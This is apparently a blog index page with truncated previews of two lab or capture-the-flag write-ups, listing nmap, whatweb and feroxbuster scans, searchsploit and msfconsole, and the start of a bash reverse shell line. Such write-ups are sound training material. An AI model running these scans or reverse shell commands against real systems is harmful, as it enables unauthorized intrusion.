Qqingquaninqingquan12.hashnode.dev·Dec 8, 2024 · 2 min readForgotten_PortalTarget machine deployment sudo ./auto_deploy.sh forgotten_portal.tar Nmap Results First of all, we start with the usual open ports. $ sudo nmap $ip -p- -n -Pn --open --min-rate 10000 -sV -sC -oN ports Options here: -p-: This option tells Nmap to...00
Qqingquaninqingquan12.hashnode.dev·Oct 16, 2024 · 1 min readDockerLabs-FindYourStyledeploy nmap whatweb feroxbuster feroxbuster -w=/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 200 -x php,txt,html -C 403,404 -u http://$ip -r searchsploit msfconsole reverse shell bash -i >& /dev...00